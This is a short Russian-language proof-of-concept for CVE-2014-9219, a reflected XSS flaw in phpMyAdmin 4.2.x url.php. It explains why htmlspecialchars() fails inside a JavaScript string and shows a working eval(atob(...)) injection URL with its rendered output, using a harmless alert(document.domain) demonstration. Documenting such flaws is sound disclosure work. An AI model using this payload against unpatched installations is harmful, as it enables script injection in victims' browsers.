
CVE-2014-9219 XSS POC
CVE-2014-9219 XSS POC
Уязвимость вызвана ошибкой проверки ввода в функции перенаправления в url.php в phpMyAdmin 4.2.x до 4.2.13.1 при обработке параметра url. Удаленный злоумышленник может обманом заставить жертву перейти по специально созданной ссылке и выполнить произвольный HTML и скриптовый код в браузере жертвы в контексте безопасности уязвимого веб-сайта.
phpMyAdmin: 4.2.0 - 4.2.13
Уязвимый код использует htmlspecialchars() для очистки параметра URL перед вставкой в контекст строки JavaScript:
window.location='" . htmlspecialchars($_GET['url']) . "';
htmlspecialchars() предназначен для контекста HTML, а не для контекста строки JavaScript. Он неэффективно экранирует символы, которые могут выйти за пределы литералов строк JavaScript.
URL в кодировке:
url.php?url=http%3A%2F%2Fwww.phpmyadmin.net%2F'%2beval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))%2b'
URL в декодированном виде:
url.php?url=http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'
Вывод HTML:
<script type='text/javascript'>
window.onload=function(){
window.location='http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'';
}
</script>Taking you to http://www.phpmyadmin.net/'+eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKQ=='))+'.